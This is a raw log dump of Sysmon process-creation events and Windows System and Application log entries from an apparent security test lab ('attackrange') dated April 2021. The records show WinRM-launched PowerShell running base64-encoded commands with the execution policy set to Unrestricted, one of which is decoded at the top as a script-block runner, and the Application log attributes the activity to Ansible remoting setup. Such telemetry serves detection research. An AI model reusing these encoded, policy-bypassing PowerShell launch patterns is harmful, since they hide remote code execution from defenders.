JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 154100x8000000000000000283Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:08.702{A8622C2F-3DC4-6078-CD02-00000000AD01}628C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC4-6078-8EC8-0F0000000000}0xfc88e0HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{A8622C2F-3DC4-6078-CC02-00000000AD01}2180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 154100x8000000000000000263Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
13:21:08.557{A8622C2F-3DC4-6078-CC02-00000000AD01}2180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC4-6078-8EC8-0F0000000000}0xfc88e0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DC4-6078-CB02-00000000AD01}4756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
154100x8000000000000000240Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:08.421{A8622C2F-3DC4-6078-CB02-00000000AD01}4756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC4-6078-8EC8-0F0000000000}0xfc88e0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DC4-6078-CA02-00000000AD01}1312C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 154100x8000000000000000227Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:08.414{A8622C2F-3DC4-6078-CA02-00000000AD01}1312C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft 
CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC4-6078-8EC8-0F0000000000}0xfc88e0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DC4-6078-C802-00000000AD01}3272C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 154100x8000000000000000208Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:08.344{A8622C2F-3DC4-6078-C802-00000000AD01}3272C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-3DC4-6078-8EC8-0F0000000000}0xfc88e0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{A8622C2F-3C5A-6078-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x8000000000000000174Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:07.527{A8622C2F-3DC3-6078-C702-00000000AD01}3636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESEE20.tmp" 
"c:\Users\Administrator\AppData\Local\Temp\CSC6A2689BA380C47528EDB8FACAF5F1D8E.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DBF-6078-8B57-0F0000000000}0xf578b0HighMD5=C877CBB966EA5939AA2A17B6A5160950,SHA256=1FE531EAC592B480AA4BD16052B909C3431434F17E7AE163D248355558CE43A6,IMPHASH=55D76ADE7FFEA0F41FF2B55505C2B362{A8622C2F-3DC3-6078-C602-00000000AD01}4996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\dm2idsto.cmdline" 154100x8000000000000000161Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:07.331{A8622C2F-3DC3-6078-C602-00000000AD01}4996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.8.3761.0 built by: NET48REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\dm2idsto.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DBF-6078-8B57-0F0000000000}0xf578b0HighMD5=23EE3D381CFE3B9F6229483E2CE2F9E1,SHA256=4240A12E0B246C9D69AF1F697488FE7DA1B497DF20F4A6F95135B4D5FE180A57,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D{A8622C2F-3DC1-6078-C402-00000000AD01}4040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 154100x8000000000000000135Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:05.957{A8622C2F-3DC1-6078-C502-00000000AD01}5000C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 
65001C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DBF-6078-8B57-0F0000000000}0xf578b0HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{A8622C2F-3DC1-6078-C402-00000000AD01}4040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 154100x8000000000000000115Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:05.813{A8622C2F-3DC1-6078-C402-00000000AD01}4040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DBF-6078-8B57-0F0000000000}0xf578b0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DBF-6078-C302-00000000AD01}4504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
154100x800000000000000090Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:03.354{A8622C2F-3DBF-6078-C302-00000000AD01}4504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DBF-6078-8B57-0F0000000000}0xf578b0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DBF-6078-C202-00000000AD01}5052C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 154100x800000000000000077Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:03.341{A8622C2F-3DBF-6078-C202-00000000AD01}5052C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
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C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DBF-6078-8B57-0F0000000000}0xf578b0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DBF-6078-C002-00000000AD01}3644C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 154100x800000000000000057Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:03.226{A8622C2F-3DBF-6078-C002-00000000AD01}3644C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-3DBF-6078-8B57-0F0000000000}0xf578b0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{A8622C2F-3C5A-6078-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x80000000000000008Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:01.714{A8622C2F-3DBD-6078-BF02-00000000AD01}4336C:\Windows\System32\wbem\unsecapp.exe10.0.14393.4169 (rs1_release.210107-1130)Sink to receive asynchronous callbacks for WMI client applicationMicrosoft® Windows® Operating SystemMicrosoft Corporationunsecapp.dllC:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3C57-6078-E703-000000000000}0x3e70SystemMD5=2443CA5962E2134CB389DCD5056D27AE,SHA256=018FF62BCDC292CF9290DB0574C8EF9C97EBC26933C8FC950DD8E6B2B91972FB,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09{A8622C2F-3C5A-6078-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 
154100x80000000000000003Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:00.268{A8622C2F-3DBC-6078-BE02-00000000AD01}4992C:\Windows\sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-C:\Windows\sysmon64.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3C57-6078-E703-000000000000}0x3e70SystemMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{A8622C2F-3C57-6078-0A00-00000000AD01}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 04/15/2021 01:09:44 PM LogName=System SourceName=Microsoft-Windows-Kernel-General EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-LI6LF79 User=NOT_TRANSLATED Sid=S-1-5-19 SidType=0 TaskCategory=5 OpCode=Info RecordNumber=89134 Keywords=Time Message=The system time has changed to ‎2021‎-‎04‎-‎15T13:09:44.631000000Z from ‎2021‎-‎04‎-‎15T13:09:44.631286700Z. Change Reason: An application or system component changed the time. 04/15/2021 01:08:12 PM LogName=Application SourceName=ConfigureRemotingForAnsible.ps1 EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-LI6LF79 TaskCategory=1 OpCode=Info RecordNumber=13541 Keywords=Classic Message=PS Remoting has been successfully configured for Ansible. 04/15/2021 01:08:12 PM LogName=Application SourceName=ConfigureRemotingForAnsible.ps1 EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-LI6LF79 TaskCategory=1 OpCode=Info RecordNumber=13540 Keywords=Classic Message=Added firewall rule to allow WinRM HTTPS. 04/15/2021 01:08:10 PM LogName=Application SourceName=ConfigureRemotingForAnsible.ps1 EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-LI6LF79 TaskCategory=1 OpCode=Info RecordNumber=13539 Keywords=Classic Message=Enabled basic auth support. 
04/15/2021 01:08:10 PM LogName=Application SourceName=ConfigureRemotingForAnsible.ps1 EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-LI6LF79 TaskCategory=1 OpCode=Info RecordNumber=13538 Keywords=Classic Message=Enabled SSL listener. 04/15/2021 01:08:10 PM LogName=Application SourceName=ConfigureRemotingForAnsible.ps1 EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-LI6LF79 TaskCategory=1 OpCode=Info RecordNumber=13537 Keywords=Classic Message=Self-signed SSL certificate generated; thumbprint: C00AE5CD081BAC6B2B2FE05B145526D20C508A1F 04/15/2021 12:29:04 PM LogName=System SourceName=Microsoft-Windows-Kernel-General EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-LI6LF79 User=NOT_TRANSLATED Sid=S-1-5-19 SidType=0 TaskCategory=5 OpCode=Info RecordNumber=88963 Keywords=Time Message=The system time has changed to ‎2021‎-‎04‎-‎15T12:29:04.919000000Z from ‎2021‎-‎04‎-‎15T12:29:04.931800200Z. Change Reason: An application or system component changed the time. 04/15/2021 12:28:36 PM LogName=System SourceName=Microsoft-Windows-Kernel-General EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-LI6LF79 User=NOT_TRANSLATED Sid=S-1-5-19 SidType=0 TaskCategory=5 OpCode=Info RecordNumber=88945 Keywords=Time Message=The system time has changed to ‎2021‎-‎04‎-‎15T12:28:36.137000000Z from ‎2021‎-‎04‎-‎15T12:28:36.151036400Z. Change Reason: An application or system component changed the time. 04/15/2021 12:28:19 PM LogName=System SourceName=Microsoft-Windows-Kernel-General EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-LI6LF79 User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 TaskCategory=5 OpCode=Info RecordNumber=88929 Keywords=Time Message=The system time has changed to ‎2021‎-‎04‎-‎15T12:28:19.016934400Z from ‎2021‎-‎04‎-‎15T12:28:19.016934400Z. Change Reason: System time adjusted to the new time zone. 
04/15/2021 12:28:14 PM LogName=System SourceName=Microsoft-Windows-Kernel-General EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-LI6LF79 User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 TaskCategory=5 OpCode=Info RecordNumber=88878 Keywords=Time Message=The system time has changed to ‎2021‎-‎04‎-‎15T12:28:14.198000000Z from ‎2021‎-‎04‎-‎15T12:28:14.202873000Z. Change Reason: An application or system component changed the time. 04/15/2021 12:28:14 PM LogName=System SourceName=Microsoft-Windows-Kernel-General EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-LI6LF79 User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 TaskCategory=5 OpCode=Info RecordNumber=88877 Keywords=Time Message=The system time has changed to ‎2021‎-‎04‎-‎15T12:28:14.198279800Z from ‎2021‎-‎04‎-‎15T12:28:14.198279800Z. Change Reason: System time adjusted to the new time zone. 04/15/2021 12:27:25 PM LogName=System SourceName=Microsoft-Windows-Kernel-General EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-4AGFDD4 User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 TaskCategory=5 OpCode=Info RecordNumber=88809 Keywords=Time Message=The system time has changed to ‎2021‎-‎04‎-‎15T12:27:25.369000000Z from ‎2021‎-‎04‎-‎15T12:27:25.385665200Z. Change Reason: An application or system component changed the time. 04/15/2021 12:27:25 PM LogName=System SourceName=Microsoft-Windows-Kernel-General EventCode=1 EventType=4 Type=Information ComputerName=EC2AMAZ-4AGFDD4 User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 TaskCategory=5 OpCode=Info RecordNumber=88808 Keywords=Time Message=The system time has changed to ‎2021‎-‎04‎-‎15T12:27:25.385247100Z from ‎2021‎-‎04‎-‎15T12:27:25.385247100Z. Change Reason: System time adjusted to the new time zone.